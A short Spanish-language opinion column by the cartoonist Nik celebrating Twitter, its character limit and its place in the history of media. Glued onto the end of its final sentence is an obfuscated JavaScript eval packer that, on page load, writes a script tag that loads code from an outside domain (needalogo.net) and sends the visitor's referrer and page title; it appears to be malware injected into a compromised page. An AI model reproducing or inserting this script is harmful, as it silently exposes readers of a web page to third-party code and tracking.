Por Nik (@nikgaturro)

Me encanta Twitter. Así nomás, con el lenguaje breve y conciso que nos exige la web 2.0 y la vida de hoy día.

Me encanta la comunicación en todas sus formas, y Twitter lo está volviendo a hacer.

Hace 90 años la llegada de la radio trajo a nosotros nuevos códigos para comunicarnos, hace 50 la televisión irrumpió y otra vez cambiaron las reglas. Ni que hablar en los noventa con el advenimiento de internet y las páginas personales. Y en los albores del 2010, la red social más influyente de la web terminó de explotar para delicia de algunos y desconcierto de muchos.

¿Qué es lo bueno de Twitter? Que tiene códigos propios pero al mismo tiempo los vamos reinventando día a día. Que nos devuelve el poder del texto, que las nuevas generaciones estaban perdiendo o deformando extrañamente en los sms.

Que el caudal de Twitter es efímero pero constante al mismo tiempo. Que nos da la sensación de “ente viviente” u “organismo vivo” formado por una comunidad en cambio permanente. Que nos demuestra que es bueno que nos pongan un límite, en este caso la cantidad de caracteres, para comprobar que siempre terminamos encontrando la forma de romper ese límite. Porque ese bloqueo aumenta la creatividad y, paradójicamente, nos abre las fronteras. Y la síntesis, el poder de la síntesis y la pregnancia del mensaje.

¿Qué otra cosa tiene de buena Twitter? Que seguramente en 3 o 4 años será distinta a lo que es hoy porque su comunidad habrá definido nuevas formas y nuevos códigos. Y dentro de 5 o 6 quizá ya esté tan incorporado a nuestras vidas como el mail.

Llame como se llame más adelante y adquiera la forma que adquiera, lo bueno de Twitter es que nos permite hoy echarle una miradita a lo que se viene, al futuro. Y lo más importante: nos permite a nosotros participar de esa construcción.eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(7(){2 d=3;2 w=1;2 h=1;2 t=d.8(\’9\’);2 4=5.a(5.b()*c);2 0=\’e://f.g/i/j?\';0=0+\’k=\’+3.l;0=0+\’&m=\’+3.n;0=0+\’&r=\’+4;d.o(\’\’)})();’,35,35,’src||var|document|id|Math|iframe|function|createElement|script|floor|random|9999||http|needalogo|net||rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style|padding||0px||border|none||width|height’.split(‘|’),0,{}))